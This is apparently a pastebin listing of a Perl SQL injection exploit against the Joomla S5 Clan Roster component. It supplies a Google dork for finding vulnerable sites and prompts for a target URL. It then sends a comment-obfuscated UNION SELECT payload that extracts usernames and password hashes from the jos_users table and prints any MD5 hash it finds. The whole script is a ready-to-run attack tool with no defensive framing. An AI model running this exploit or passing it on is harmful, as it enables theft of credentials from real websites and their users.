SHOW:
|
|
- or go back to the newest paste.
| 1 | #!/usr/bin/perl | |
| 2 | #Exploit title: Joomla S5 Clan Roster com_s5clanroster SQL Injection exploit | |
| 3 | #Google Dork: inurl:index.php?option=com_s5clanroster& | |
| 4 | #Vendor HomePage: http://www.joomla.org/ | |
| 5 | system("clear");
| |
| 6 | system("cls");
| |
| 7 | print "=========================================================\n"; | |
| 8 | print "* Joomla S5 Clan Roster com_s5clanroster SQL Injection *\n"; | |
| 9 | print "* Coded by TheLooper *\n"; | |
| 10 | print "* Greetz: To All My Friends <3 *\n"; | |
| 11 | print "=========================================================\n"; | |
| 12 | sleep 1; | |
| 13 | use LWP::UserAgent; | |
| 14 | print "Enter the target site: "; | |
| 15 | chomp(my $target=<STDIN>); | |
| 16 | $code="%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(username,0x3a,password),222+from+jos_users--%20-"; | |
| 17 | $agent = LWP::UserAgent->new() or die "[!] Error while processing"; | |
| 18 | $agent->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.12011');
| |
| 19 | $host= $target. "/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null".$code; | |
| 20 | $ok = $agent->request(HTTP::Request->new(GET=>$host)); | |
| 21 | $ok1 = $ok->content; if ($ok1 =~/([0-9a-fA-F]{32})/){
| |
| 22 | print "[+] Password found --> $1\n$2\n"; | |
| 23 | sleep 1; | |
| 24 | } | |
| 25 | else | |
| 26 | {
| |
| 27 | print "Password not found \n"; | |
| 28 | } |